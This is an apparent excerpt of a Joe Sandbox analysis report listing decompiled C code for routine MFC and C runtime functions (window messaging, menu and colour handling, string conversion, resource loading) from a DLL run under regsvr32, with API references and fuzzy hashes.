                                                                                                                			E1001CEB9(void* __ecx, void* __edi, void* __ebp, signed int _a4) {
                                                                                                                				void* __ebx;
                                                                                                                				void* __esi;
                                                                                                                				void* _t16;
                                                                                                                				int _t17;
                                                                                                                				int _t18;
                                                                                                                				struct HWND__* _t19;
                                                                                                                				intOrPtr _t25;
                                                                                                                				intOrPtr _t33;
                                                                                                                				void* _t35;
                                                                                                                
                                                                                                                				_t32 = __edi;
                                                                                                                				_t35 = __ecx;
                                                                                                                				_t25 =  *((intOrPtr*)(__ecx + 0xc));
                                                                                                                				if(_t25 == 0) {
                                                                                                                					__eflags =  *((intOrPtr*)(__ecx + 0x14));
                                                                                                                					if(__eflags == 0) {
                                                                                                                						L3:
                                                                                                                						_t17 = E1001729E(0, _t25, _t32, _t35, _t39);
                                                                                                                						L4:
                                                                                                                						asm("sbb edx, edx");
                                                                                                                						_t18 = EnableMenuItem( *(_t25 + 4), _t17, ( ~_a4 & 0xfffffffd) + 0x00000003 | 0x00000400);
                                                                                                                						L11:
                                                                                                                						 *((intOrPtr*)(_t35 + 0x18)) = 1;
                                                                                                                						return _t18;
                                                                                                                					}
                                                                                                                					__eflags = _a4;
                                                                                                                					if(_a4 == 0) {
                                                                                                                						_push(__edi);
                                                                                                                						_t33 =  *((intOrPtr*)(__ecx + 0x14));
                                                                                                                						_t19 = GetFocus();
                                                                                                                						__eflags = _t19 -  *(_t33 + 0x20);
                                                                                                                						if(_t19 ==  *(_t33 + 0x20)) {
                                                                                                                							SendMessageA( *(E10019C16(0, _t25, __ebp, GetParent( *(_t33 + 0x20))) + 0x20), 0x28, 0, 0);
                                                                                                                						}
                                                                                                                					}
                                                                                                                					_t18 = E1001D39A( *((intOrPtr*)(_t35 + 0x14)), _a4);
                                                                                                                					goto L11;
                                                                                                                				}
                                                                                                                				if( *((intOrPtr*)(__ecx + 0x10)) == 0) {
                                                                                                                					_t17 =  *(__ecx + 8);
                                                                                                                					_t39 = _t17 -  *((intOrPtr*)(__ecx + 0x20));
                                                                                                                					if(_t17 <  *((intOrPtr*)(__ecx + 0x20))) {
                                                                                                                						goto L4;
                                                                                                                					}
                                                                                                                					goto L3;
                                                                                                                				}
                                                                                                                				return _t16;
                                                                                                                			}













                                                                                                                APIs
                                                                                                                • EnableMenuItem.USER32 ref: 1001CEF1
                                                                                                                  • Part of subcall function 1001729E: __CxxThrowException@8.LIBCMT ref: 100172B2
                                                                                                                  • Part of subcall function 1001729E: __EH_prolog3.LIBCMT ref: 100172BF
                                                                                                                • GetFocus.USER32 ref: 1001CF08
                                                                                                                • GetParent.USER32(?), ref: 1001CF16
                                                                                                                • SendMessageA.USER32 ref: 1001CF29
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: EnableException@8FocusH_prolog3ItemMenuMessageParentSendThrow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3849708097-0
                                                                                                                • Opcode ID: 52987512689cd87fb0ec750acb752fdbb78254d950772e2af84ae9505edaf180
                                                                                                                • Instruction ID: 5cf31e8e01a0a06e9da432ca0d9e4f7177fe00446aaafd48b1635c748570ef32
                                                                                                                • Opcode Fuzzy Hash: 52987512689cd87fb0ec750acb752fdbb78254d950772e2af84ae9505edaf180
                                                                                                                • Instruction Fuzzy Hash: BD115B71500615AFD724DF60DC88D1BB7FAFB88315B108A2DF1865A965C770EC85CB61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 77%
                                                                                                                			E10014160(void* __ecx) {
                                                                                                                				long _t10;
                                                                                                                				void* _t21;
                                                                                                                				void* _t28;
                                                                                                                
                                                                                                                				_t28 = __ecx;
                                                                                                                				_t10 = SendMessageA( *(__ecx + 0x1a4), 0xf0, 0, 0);
                                                                                                                				_t21 = _t28 + 0x130;
                                                                                                                				if(_t10 == 0) {
                                                                                                                					E1001D39A(_t21, 1);
                                                                                                                					E1001D39A(_t28 + 0xdc, 1);
                                                                                                                					_push(1);
                                                                                                                				} else {
                                                                                                                					E1001D39A(_t21, 0);
                                                                                                                					E1001D39A(_t28 + 0xdc, 0);
                                                                                                                					_push(0);
                                                                                                                				}
                                                                                                                				E1001D39A(_t28 + 0x88);
                                                                                                                				SendMessageA( *(_t28 + 0x150), 0xf1, 0, 0);
                                                                                                                				SendMessageA( *(_t28 + 0xfc), 0xf1, 0, 0);
                                                                                                                				return SendMessageA( *(_t28 + 0xa8), 0xf1, 0, 0);
                                                                                                                			}







                                                                                                                APIs
                                                                                                                • SendMessageA.USER32 ref: 1001417A
                                                                                                                • SendMessageA.USER32 ref: 100141CF
                                                                                                                • SendMessageA.USER32 ref: 100141E1
                                                                                                                • SendMessageA.USER32 ref: 100141F3
                                                                                                                  • Part of subcall function 1001D39A: EnableWindow.USER32(?,00000000), ref: 1001D3A7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$EnableWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1554173715-0
                                                                                                                • Opcode ID: 0c24353fce181e7fa814d434cdea74dde533605d64b0d52f749b46cc6aaf991e
                                                                                                                • Instruction ID: 8308aae739d2d9e2107296dacd73f1b1bc2052d6c29538c5b22a110270b90cac
                                                                                                                • Opcode Fuzzy Hash: 0c24353fce181e7fa814d434cdea74dde533605d64b0d52f749b46cc6aaf991e
                                                                                                                • Instruction Fuzzy Hash: 6E0128353C0701BAFA34F6649C63FD7A294AB94B00F12452AB35AAE0D48EE0B5818665
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 77%
                                                                                                                			E1001A586(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, int _a12, long _a16, struct HWND__* _a20, struct HWND__* _a24) {
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				struct HWND__* _t16;
                                                                                                                				struct HWND__* _t18;
                                                                                                                				struct HWND__* _t20;
                                                                                                                				void* _t22;
                                                                                                                				void* _t23;
                                                                                                                				void* _t24;
                                                                                                                				struct HWND__* _t25;
                                                                                                                
                                                                                                                				_t23 = __ecx;
                                                                                                                				_t22 = __ebx;
                                                                                                                				_t24 = GetTopWindow;
                                                                                                                				_t16 = GetTopWindow(_a4);
                                                                                                                				while(1) {
                                                                                                                					_t25 = _t16;
                                                                                                                					if(_t25 == 0) {
                                                                                                                						break;
                                                                                                                					}
                                                                                                                					__eflags = _a24;
                                                                                                                					if(__eflags == 0) {
                                                                                                                						SendMessageA(_t25, _a8, _a12, _a16);
                                                                                                                					} else {
                                                                                                                						_t20 = E10019C3D(_t23, _t24, _t25, __eflags, _t25);
                                                                                                                						__eflags = _t20;
                                                                                                                						if(__eflags != 0) {
                                                                                                                							_push(_a16);
                                                                                                                							_push(_a12);
                                                                                                                							_push(_a8);
                                                                                                                							_push( *((intOrPtr*)(_t20 + 0x20)));
                                                                                                                							_push(_t20);
                                                                                                                							E1001A2AB(_t22, _t24, _t25, __eflags);
                                                                                                                						}
                                                                                                                					}
                                                                                                                					__eflags = _a20;
                                                                                                                					if(_a20 != 0) {
                                                                                                                						_t18 = GetTopWindow(_t25);
                                                                                                                						__eflags = _t18;
                                                                                                                						if(_t18 != 0) {
                                                                                                                							E1001A586(_t22, _t23, _t25, _a8, _a12, _a16, _a20, _a24);
                                                                                                                						}
                                                                                                                					}
                                                                                                                					_t16 = GetWindow(_t25, 2);
                                                                                                                				}
                                                                                                                				return _t16;
                                                                                                                			}














                                                                                                                APIs
                                                                                                                • GetTopWindow.USER32(00000000), ref: 1001A594
                                                                                                                • GetTopWindow.USER32(00000000), ref: 1001A5D3
                                                                                                                • GetWindow.USER32(00000000,00000002), ref: 1001A5F1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window
                                                                                                                • String ID:
                                                                                                                • API String ID: 2353593579-0
                                                                                                                • Opcode ID: d7358cc00cbd99a1976692eb103cece243867016612caeb8318c002da2529d05
                                                                                                                • Instruction ID: 63638fef5a96a07e09e5da3520ad298f1a6d341acad3fdbfcdb56d5f1322e381
                                                                                                                • Opcode Fuzzy Hash: d7358cc00cbd99a1976692eb103cece243867016612caeb8318c002da2529d05
                                                                                                                • Instruction Fuzzy Hash: E901E936044A1ABBCF539F91DC04E9F3BAAEF0A290F014014FE0059021D736CAE1EFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E10047233(void* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                                                				intOrPtr _t25;
                                                                                                                				void* _t26;
                                                                                                                				void* _t28;
                                                                                                                				void* _t29;
                                                                                                                
                                                                                                                				_t28 = __ebx;
                                                                                                                				_t25 = _a16;
                                                                                                                				if(_t25 == 0x65 || _t25 == 0x45) {
                                                                                                                					_t26 = E10046B30(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                                					goto L9;
                                                                                                                				} else {
                                                                                                                					_t35 = _t25 - 0x66;
                                                                                                                					if(_t25 != 0x66) {
                                                                                                                						__eflags = _t25 - 0x61;
                                                                                                                						if(_t25 == 0x61) {
                                                                                                                							L7:
                                                                                                                							_t26 = E10046C1C(_t28, _t29, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                                						} else {
                                                                                                                							__eflags = _t25 - 0x41;
                                                                                                                							if(__eflags == 0) {
                                                                                                                								goto L7;
                                                                                                                							} else {
                                                                                                                								_t26 = E1004713B(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                                							}
                                                                                                                						}
                                                                                                                						L9:
                                                                                                                						return _t26;
                                                                                                                					} else {
                                                                                                                						return E10047082(_t29, _t35, _a4, _a8, _a12, _a20, _a28);
                                                                                                                					}
                                                                                                                				}
                                                                                                                			}








                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                • String ID:
                                                                                                                • API String ID: 3016257755-0
                                                                                                                • Opcode ID: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
                                                                                                                • Instruction ID: bb190076197b3c47cc7c8057e8d98d2e68558706b181164bb56e9f5d22d89dcf
                                                                                                                • Opcode Fuzzy Hash: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
                                                                                                                • Instruction Fuzzy Hash: 3A01897640004ABBCF129E84CD41CEE3F62FB09284F298565FE1898131D377DAB1AF86
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 96%
                                                                                                                			E10019F45(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				struct HWND__* _t9;
                                                                                                                				struct HWND__* _t10;
                                                                                                                				void* _t14;
                                                                                                                				void* _t15;
                                                                                                                				struct HWND__* _t16;
                                                                                                                				struct HWND__* _t17;
                                                                                                                				void* _t18;
                                                                                                                
                                                                                                                				_t14 = __ecx;
                                                                                                                				_t13 = __ebx;
                                                                                                                				_t9 = GetDlgItem(_a4, _a8);
                                                                                                                				_t15 = GetTopWindow;
                                                                                                                				_t16 = _t9;
                                                                                                                				if(_t16 == 0) {
                                                                                                                					L6:
                                                                                                                					_t10 = GetTopWindow(_a4);
                                                                                                                					while(1) {
                                                                                                                						_t17 = _t10;
                                                                                                                						__eflags = _t17;
                                                                                                                						if(_t17 == 0) {
                                                                                                                							goto L10;
                                                                                                                						}
                                                                                                                						_t10 = E10019F45(_t13, _t14, _t17, _a8, _a12);
                                                                                                                						__eflags = _t10;
                                                                                                                						if(_t10 == 0) {
                                                                                                                							_t10 = GetWindow(_t17, 2);
                                                                                                                							continue;
                                                                                                                						}
                                                                                                                						goto L10;
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					if(GetTopWindow(_t16) == 0) {
                                                                                                                						L3:
                                                                                                                						_push(_t16);
                                                                                                                						if(_a12 == 0) {
                                                                                                                							return E10019C16(_t13, _t14, _t18);
                                                                                                                						}
                                                                                                                						_t10 = E10019C3D(_t14, _t15, _t16, __eflags);
                                                                                                                						__eflags = _t10;
                                                                                                                						if(_t10 == 0) {
                                                                                                                							goto L6;
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						_t10 = E10019F45(__ebx, _t14, _t16, _a8, _a12);
                                                                                                                						if(_t10 == 0) {
                                                                                                                							goto L3;
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				L10:
                                                                                                                				return _t10;
                                                                                                                			}

                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,?), ref: 10019F50
                                                                                                                • GetTopWindow.USER32(00000000), ref: 10019F63
                                                                                                                  • Part of subcall function 10019F45: GetWindow.USER32(00000000,00000002), ref: 10019FAA
                                                                                                                • GetTopWindow.USER32(?), ref: 10019F93
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Item
                                                                                                                • String ID:
                                                                                                                • API String ID: 369458955-0
                                                                                                                • Opcode ID: 38bd6319779c25a45ee2896bc22a6c4c08e6ae0c7078cc5ba6acd4dcbea4d3c2
                                                                                                                • Instruction ID: 7b5cadcf030ea57ab621abf36d6a866f09d7c641b742e1b5f6ade8078567b29c
                                                                                                                • Opcode Fuzzy Hash: 38bd6319779c25a45ee2896bc22a6c4c08e6ae0c7078cc5ba6acd4dcbea4d3c2
                                                                                                                • Instruction Fuzzy Hash: 3D016D3640566ABBDB22EF62CC04F8F3A99EF442E0F014038FD15DE125D731D9929AE5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 50%
                                                                                                                			E1002C612(short* _a4) {
                                                                                                                				char* _v0;
                                                                                                                				int _v8;
                                                                                                                				int _v16;
                                                                                                                				void* __ebx;
                                                                                                                				void* __ecx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				int _t6;
                                                                                                                				char* _t7;
                                                                                                                				void* _t12;
                                                                                                                				char* _t13;
                                                                                                                				void* _t15;
                                                                                                                				void* _t16;
                                                                                                                				short* _t20;
                                                                                                                
                                                                                                                				_t20 = _a4;
                                                                                                                				if(_t20 != 0) {
                                                                                                                					__imp__#7(_t20, _t16, _t12);
                                                                                                                					_v8 = _t6;
                                                                                                                					_t7 = WideCharToMultiByte(0, 0, _t20, _t6, 0, 0, 0, 0);
                                                                                                                					_v0 = _t7;
                                                                                                                					__imp__#150(0, _t7);
                                                                                                                					_t13 = _t7;
                                                                                                                					__eflags = _t13;
                                                                                                                					if(__eflags == 0) {
                                                                                                                						E1001726A(_t13, _t15, WideCharToMultiByte, 0, __eflags);
                                                                                                                					}
                                                                                                                					WideCharToMultiByte(0, 0, _t20, _v16, _t13, _v8, 0, 0);
                                                                                                                					return _t13;
                                                                                                                				}
                                                                                                                				return 0;
                                                                                                                			}

                                                                                                                APIs
                                                                                                                • SysStringLen.OLEAUT32(?), ref: 1002C626
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,0000000C,1002C903,00000000,00000018,1002CC49), ref: 1002C63E
                                                                                                                • SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 1002C646
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000,?,?,0000000C,1002C903,00000000,00000018,1002CC49), ref: 1002C665
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Byte$CharMultiStringWide$Alloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 3384502665-0
                                                                                                                • Opcode ID: 1177553cbf17203df43465aeb6c3ba90d8ab090d0b4f3017ddf2c7f1133e5107
                                                                                                                • Instruction ID: 8bfdf84d9a1f1fe7d8b87919ce8c5274f58af7d09d522709d96be8513beb56e0
                                                                                                                • Opcode Fuzzy Hash: 1177553cbf17203df43465aeb6c3ba90d8ab090d0b4f3017ddf2c7f1133e5107
                                                                                                                • Instruction Fuzzy Hash: 15F030721062787F93215BA69C8CCABBFDCFF8F2E5B11062AF94992110D6759900C6F1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 89%
                                                                                                                			E10044673(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				signed int _t15;
                                                                                                                				LONG* _t21;
                                                                                                                				long _t23;
                                                                                                                				void* _t31;
                                                                                                                				LONG* _t33;
                                                                                                                				void* _t34;
                                                                                                                				void* _t35;
                                                                                                                
                                                                                                                				_t35 = __eflags;
                                                                                                                				_t29 = __edx;
                                                                                                                				_t25 = __ebx;
                                                                                                                				_push(0xc);
                                                                                                                				_push(0x10069048);
                                                                                                                				E1003D578(__ebx, __edi, __esi);
                                                                                                                				_t31 = E10042B23(__edx, __edi, _t35);
                                                                                                                				_t15 =  *0x1006e504; // 0xfffffffe
                                                                                                                				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                                                                                					E1004329E(0xd);
                                                                                                                					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                                                                                					_t33 =  *(_t31 + 0x68);
                                                                                                                					 *(_t34 - 0x1c) = _t33;
                                                                                                                					__eflags = _t33 -  *0x1006e408; // 0xef14a8
                                                                                                                					if(__eflags != 0) {
                                                                                                                						__eflags = _t33;
                                                                                                                						if(_t33 != 0) {
                                                                                                                							_t23 = InterlockedDecrement(_t33);
                                                                                                                							__eflags = _t23;
                                                                                                                							if(_t23 == 0) {
                                                                                                                								__eflags = _t33 - 0x1006dfe0;
                                                                                                                								if(__eflags != 0) {
                                                                                                                									_push(_t33);
                                                                                                                									E1003B59D(_t25, _t31, _t33, __eflags);
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                						_t21 =  *0x1006e408; // 0xef14a8
                                                                                                                						 *(_t31 + 0x68) = _t21;
                                                                                                                						_t33 =  *0x1006e408; // 0xef14a8
                                                                                                                						 *(_t34 - 0x1c) = _t33;
                                                                                                                						InterlockedIncrement(_t33);
                                                                                                                					}
                                                                                                                					 *(_t34 - 4) = 0xfffffffe;
                                                                                                                					E1004470E();
                                                                                                                				} else {
                                                                                                                					_t33 =  *(_t31 + 0x68);
                                                                                                                				}
                                                                                                                				if(_t33 == 0) {
                                                                                                                					E10040B91(_t25, _t29, _t31, 0x20);
                                                                                                                				}
                                                                                                                				return E1003D5BD(_t33);
                                                                                                                			}











                                                                                                                APIs
                                                                                                                  • Part of subcall function 10042B23: __getptd_noexit.LIBCMT ref: 10042B24
                                                                                                                  • Part of subcall function 10042B23: __amsg_exit.LIBCMT ref: 10042B31
                                                                                                                • __amsg_exit.LIBCMT ref: 1004469F
                                                                                                                • __lock.LIBCMT ref: 100446AF
                                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 100446CC
                                                                                                                • InterlockedIncrement.KERNEL32(00EF14A8), ref: 100446F7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
                                                                                                                • String ID:
                                                                                                                • API String ID: 2880340415-0
                                                                                                                • Opcode ID: 734dba7c6c98470b2c8f0df44824f53dd19183195a7be9b8e214148305e01f9d
                                                                                                                • Instruction ID: bdd71656707cbe46e15d2e26963bf9bd323e1d49f1515a5aa100c235d06d7cbf
                                                                                                                • Opcode Fuzzy Hash: 734dba7c6c98470b2c8f0df44824f53dd19183195a7be9b8e214148305e01f9d
                                                                                                                • Instruction Fuzzy Hash: 27016D39901B219BEB01DB64994974977E1EF0A758F230126E810E7290CF74AD42CBDA
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E10018321(struct HDC__* _a4, intOrPtr _a8, intOrPtr _a12, void* _a16, long _a20) {
                                                                                                                				long _v12;
                                                                                                                				void _v16;
                                                                                                                				intOrPtr _t12;
                                                                                                                				long _t16;
                                                                                                                				void* _t21;
                                                                                                                				void* _t22;
                                                                                                                				void* _t23;
                                                                                                                
                                                                                                                				if(_a4 == 0 || _a16 == 0) {
                                                                                                                					L10:
                                                                                                                					return 0;
                                                                                                                				} else {
                                                                                                                					_t12 = _a12;
                                                                                                                					if(_t12 == 1 || _t12 == 0 || _t12 == 5 || _t12 == 2 && E1002D888(_t21, _t22, _t23, _a8, _t12) == 0) {
                                                                                                                						goto L10;
                                                                                                                					} else {
                                                                                                                						GetObjectA(_a16, 0xc,  &_v16);
                                                                                                                						SetBkColor(_a4, _v12);
                                                                                                                						_t16 = _a20;
                                                                                                                						if(_t16 == 0xffffffff) {
                                                                                                                							_t16 = GetSysColor(8);
                                                                                                                						}
                                                                                                                						SetTextColor(_a4, _t16);
                                                                                                                						return 1;
                                                                                                                					}
                                                                                                                				}
                                                                                                                			}











                                                                                                                APIs
                                                                                                                • GetObjectA.GDI32(00000000,0000000C,?), ref: 1001835F
                                                                                                                • SetBkColor.GDI32(00000000,00000000), ref: 1001836B
                                                                                                                • GetSysColor.USER32 ref: 1001837B
                                                                                                                • SetTextColor.GDI32(00000000,?), ref: 10018385
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Color$ObjectText
                                                                                                                • String ID:
                                                                                                                • API String ID: 829078354-0
                                                                                                                • Opcode ID: 1acd69621d3fed65b9aba393824c9cd69a63a529b189f48ae66a45ed895b073b
                                                                                                                • Instruction ID: f0d5099a693eeb0029ffa53bf9b215b6e22ef4be6effeed382749ae4f6f43190
                                                                                                                • Opcode Fuzzy Hash: 1acd69621d3fed65b9aba393824c9cd69a63a529b189f48ae66a45ed895b073b
                                                                                                                • Instruction Fuzzy Hash: 6501FB31900109ABEF91DF60EC85AAE7BA9EB04795F584620FA22D91E0D770CFD0DB51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1001CA95(void* __ecx, CHAR* _a4) {
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				struct HRSRC__* _t8;
                                                                                                                				void* _t9;
                                                                                                                				void* _t11;
                                                                                                                				void* _t14;
                                                                                                                				void* _t15;
                                                                                                                				void* _t16;
                                                                                                                				struct HINSTANCE__* _t17;
                                                                                                                				void* _t18;
                                                                                                                
                                                                                                                				_t14 = 0;
                                                                                                                				_t11 = 0;
                                                                                                                				_t19 = _a4;
                                                                                                                				_t18 = __ecx;
                                                                                                                				if(_a4 == 0) {
                                                                                                                					L4:
                                                                                                                					_t16 = E1001C64C(_t18, _t11);
                                                                                                                					if(_t11 != 0 && _t14 != 0) {
                                                                                                                						FreeResource(_t14);
                                                                                                                					}
                                                                                                                					return _t16;
                                                                                                                				}
                                                                                                                				_t17 =  *(E10023187(0, 0, _t15, _t19) + 0xc);
                                                                                                                				_t8 = FindResourceA(_t17, _a4, 0xf0);
                                                                                                                				if(_t8 == 0) {
                                                                                                                					goto L4;
                                                                                                                				}
                                                                                                                				_t9 = LoadResource(_t17, _t8);
                                                                                                                				_t14 = _t9;
                                                                                                                				if(_t14 != 0) {
                                                                                                                					_t11 = LockResource(_t14);
                                                                                                                					goto L4;
                                                                                                                				}
                                                                                                                				return _t9;
                                                                                                                			}
















                                                                                                                APIs
                                                                                                                • FindResourceA.KERNEL32 ref: 1001CAB7
                                                                                                                • LoadResource.KERNEL32(?,00000000,?,?,?,?,10021031,?,?,1000D18A,DF7C0CDA), ref: 1001CAC3
                                                                                                                • LockResource.KERNEL32(00000000,?,?,?,?,10021031,?,?,1000D18A,DF7C0CDA), ref: 1001CAD0
                                                                                                                • FreeResource.KERNEL32(00000000,00000000,?,?,?,?,10021031,?,?,1000D18A,DF7C0CDA), ref: 1001CAEB
                                                                                                                Memory Dump Source
